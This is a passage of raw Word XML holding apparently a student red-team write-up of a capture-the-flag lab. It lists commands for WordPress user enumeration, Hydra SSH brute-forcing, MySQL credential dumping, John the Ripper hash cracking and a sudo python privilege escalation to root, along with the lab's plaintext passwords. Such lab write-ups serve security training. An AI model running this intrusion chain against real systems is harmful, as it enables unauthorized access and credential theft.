      <w:r w:rsidRPr="00EA1056">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Found 2 Usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C45DCBF" w14:textId="41CECF73" w:rsidR="00472028" w:rsidRDefault="00472028" w:rsidP="00472028">
      <w:r w:rsidRPr="008B7506">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F9349D" wp14:editId="5E455D4A">
            <wp:extent cx="4752975" cy="98969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8" cy="10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E8C6" w14:textId="3D062C46" w:rsidR="00472028" w:rsidRPr="00423CF8" w:rsidRDefault="00472028" w:rsidP="0047202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041155D0" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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critical vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2815CD9A" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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critical vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D59E5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EE94EF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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C5A59" w14:textId="22318FF4" w:rsidR="003D17AA" w:rsidRPr="003D17AA" w:rsidRDefault="00423CF8" w:rsidP="003D17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critical vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AA2DAD" w14:textId="5A254E56" w:rsidR="00353002" w:rsidRDefault="00353002" w:rsidP="00353002">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk45707234"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>http://192.168.1.115</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> –wp-content-dir -ep -et -eu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="643B1028" w14:textId="70373204" w:rsidR="00353002" w:rsidRDefault="00353002" w:rsidP="00353002">
      <w:pPr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7E3DE79F" wp14:editId="6F0E578B">
            <wp:extent cx="4819650" cy="33140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263" cy="33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C682" w14:textId="5F3EEB27" w:rsidR="00353002" w:rsidRPr="00423CF8" w:rsidRDefault="00353002" w:rsidP="00353002">
      <w:pPr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BD01D3A" wp14:editId="2B9F854B">
            <wp:extent cx="4827181" cy="1729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410" cy="17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BF42" w14:textId="77777777" w:rsidR="00353002" w:rsidRDefault="00353002" w:rsidP="003530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44BF5BC7" w14:textId="07EB443E" w:rsidR="00353002" w:rsidRDefault="00423CF8" w:rsidP="0035300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lastRenderedPageBreak/>
        <w:t>List of critical vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11370C9B" w14:textId="1CD211C3" w:rsidR="00353002" w:rsidRPr="00423CF8" w:rsidRDefault="00353002" w:rsidP="003530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Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PHPMailer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ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2.16 found this via ‘Version’ page on their website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F6454" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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List of critical vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8C52F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E9741F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189B9D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color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B7139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366D6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color w:val="000000"/>
        </w:rPr>
        <w:t>The Red Team was able to penetrate both Target 1 and Target 2 and retrieve the following confidential data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CCC07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BE96F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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42270657" w14:textId="09660D32" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF8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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1431A" w14:textId="52380D71" w:rsidR="00353002" w:rsidRPr="00423CF8" w:rsidRDefault="00353002" w:rsidP="003530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4B688F74" wp14:editId="1C025589">
            <wp:extent cx="3705225" cy="126914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077" cy="12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6C33" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444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03E783FF" w14:textId="13BD8B08" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="0035300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Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE2131D" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00353002" w:rsidP="003530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</w:p>
    <w:p w14:paraId="486B6880" w14:textId="4E043DA4" w:rsidR="00353002" w:rsidRDefault="00C444D0" w:rsidP="003530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  <w:r w:rsidR="00353002">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Found in the ‘source tables’ on website/service.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBBFAAE" w14:textId="56E17635" w:rsidR="00353002" w:rsidRPr="00423CF8" w:rsidRDefault="00353002" w:rsidP="003530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Right-click ‘View Page Source’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF88E7" w14:textId="2B14F522" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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TODO: Include the command run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0CD525" w14:textId="2D59C455" w:rsidR="00353002" w:rsidRDefault="00353002" w:rsidP="00353002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</w:p>
    <w:p w14:paraId="67CDCD30" w14:textId="77777777" w:rsidR="00353002" w:rsidRPr="00423CF8" w:rsidRDefault="00353002" w:rsidP="00353002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</w:p>
    <w:p w14:paraId="44D87EF1" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00423CF8" w:rsidP="00423CF8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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag2.txt</w:t>
      </w:r>
      <w:r w:rsidR="00353002">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3F9C2" w14:textId="78D29137" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00C444D0" w:rsidP="00C444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    </w:t>
      </w:r>
      <w:r w:rsidR="00353002">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00353002">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FE82FD7" wp14:editId="79802624">
            <wp:extent cx="3105150" cy="295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E0A" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444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03B0FE42" w14:textId="74FA0E90" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="0035300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Exploit Used</w:t>
      </w:r>
      <w:r w:rsidR="00C444D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD117F4" w14:textId="6990D9A2" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444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</w:p>
    <w:p w14:paraId="078C129A" w14:textId="4323F704" w:rsidR="00353002" w:rsidRDefault="00353002" w:rsidP="0035300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Hydra to find Michael’s password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6FA75" w14:textId="2DB3B28A" w:rsidR="00353002" w:rsidRDefault="00353002" w:rsidP="00353002">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>$</w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk45711092"/>
      <w:r w:rsidRPr="00353002">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hydra -l steven/Michael -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/shar/wordlists/rockyou.txt 192.168.1.110 -t 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3816E0C0" w14:textId="61A6F9CE" w:rsidR="00423CF8" w:rsidRDefault="00C444D0" w:rsidP="00353002">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Used Michael’s SSH credentials to login via SSH and </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve">then looked in /var/www/ folder and cat the </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>flag2.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52396952" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0"/>
    <w:p w14:paraId="7A051825" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0"/>
    <w:p w14:paraId="28BAB405" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0"/>
    <w:p w14:paraId="0EC6E48C" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0"/>
    <w:p w14:paraId="025392AB" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0"/>
    <w:p w14:paraId="1943D670" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCA2F19" w14:textId="2F2AD540" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EXTRA: looking thru the MySQL tables to find the SQL database password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E669A" w14:textId="77DC5401" w:rsidR="00C444D0" w:rsidRPr="00423CF8" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:r>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4422708F" wp14:editId="784507E5">
            <wp:extent cx="4486275" cy="4962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061" cy="50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9394" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE68CED" w14:textId="27F3B953" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C444D0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>EXTRA 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Found Steven’s password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E49CD" w14:textId="11825933" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Logged into MySQL $ </w:t>
      </w:r>
      <w:r>
        <w:t>var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A4AE0D" w14:textId="63FE6247" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>P: R@v3nSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D1B3B" w14:textId="4797570B" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>$ show databases;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9EDA21" w14:textId="152500AB" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">$ use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6C18F1" w14:textId="13F3204F" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>$ show tables;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B2BF8" w14:textId="275A1590" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">$ select * from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1869CD2D" w14:textId="77777777" w:rsidR="00C444D0" w:rsidRDefault="00C444D0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2042000A" w14:textId="4F8660AC" w:rsidR="00C444D0" w:rsidRDefault="00C444D0" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720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0DFA7780" wp14:editId="3047DA17">
            <wp:extent cx="5943600" cy="1761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8CA" w14:textId="585D5965" w:rsidR="00C444D0" w:rsidRDefault="008F3FD5" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto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Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JohnTheRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack the pw hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103B4F83" w14:textId="62F7E5B6" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto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*saved hash to wp-hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B345381" w14:textId="253DA0BC" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto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$ john wp_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484C0E89" w14:textId="15E49F36" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="7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BE5C102" wp14:editId="404443AA">
            <wp:extent cx="5943600" cy="889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94E8" w14:textId="013F8736" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto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Steven’s password is pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D32D6EA" w14:textId="226BC6F9" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="00C444D0">
      <w:pPr>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BBCF622" w14:textId="0C5E2FD5" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="24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EXTRA 3 FLAG 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0B8EA1" w14:textId="77777777" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">$ Ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="006C6749">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>steven@192.168.1.110</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> p:pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056BA05E" w14:textId="77777777" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">$ Sudo -l </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF3F385" w14:textId="77777777" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Steven can run python as sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1DFBB" w14:textId="77777777" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>$ Sudo python -c ‘import pty;pty.spawn(“/bin/bash”);’ to gain root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F80B511" w14:textId="77777777" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Then navigate to root folder to find the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF267D" w14:textId="77777777" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024A64D9" w14:textId="4FEC15DA" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto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34661FD6" wp14:editId="4CE03207">
            <wp:extent cx="3362325" cy="19139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321" cy="19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27D5" w14:textId="60B70BC5" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694B76FB" w14:textId="6D463073" w:rsidR="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="24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EXTRA 4 FLAG 3 in the MySQL tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38BDAB75" wp14:editId="5F676EC2">
            <wp:extent cx="3467100" cy="523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66B3" w14:textId="76EE985F" w:rsidR="007F39CD" w:rsidRPr="007F39CD" w:rsidRDefault="007F39CD" w:rsidP="007F39CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32ED4424" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423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CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535BF7C9" w14:textId="5889CD57" w:rsidR="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00423CF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3997716D" w14:textId="01E72EE1" w:rsidR="008F3FD5" w:rsidRPr="00423CF8" w:rsidRDefault="008F3FD5" w:rsidP="008F3FD5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1CFE1DC5" wp14:editId="5BC8D29A">
            <wp:extent cx="3248025" cy="600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CAA4" w14:textId="77777777" w:rsidR="00423CF8" w:rsidRPr="00423CF8" w:rsidRDefault="00423CF8" w:rsidP="00423CF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Exploit Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCB311" w14:textId="3C925D58" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="008F3FD5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Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> to enumerate directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613C0D3" w14:textId="434B5127" w:rsidR="008F3FD5" w:rsidRDefault="008F3FD5" w:rsidP="008F3FD5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Found something called “vendor”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B752FDE" w14:textId="6CF92C62" w:rsidR="008F3FD5" w:rsidRPr="00423CF8" w:rsidRDefault="008F3FD5" w:rsidP="008F3FD5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Looked in there to find the 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3FD5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1EF5E" w14:textId="7CF32944" w:rsidR="00423CF8" w:rsidRDefault="008F3FD5" w:rsidP="00423CF8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$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
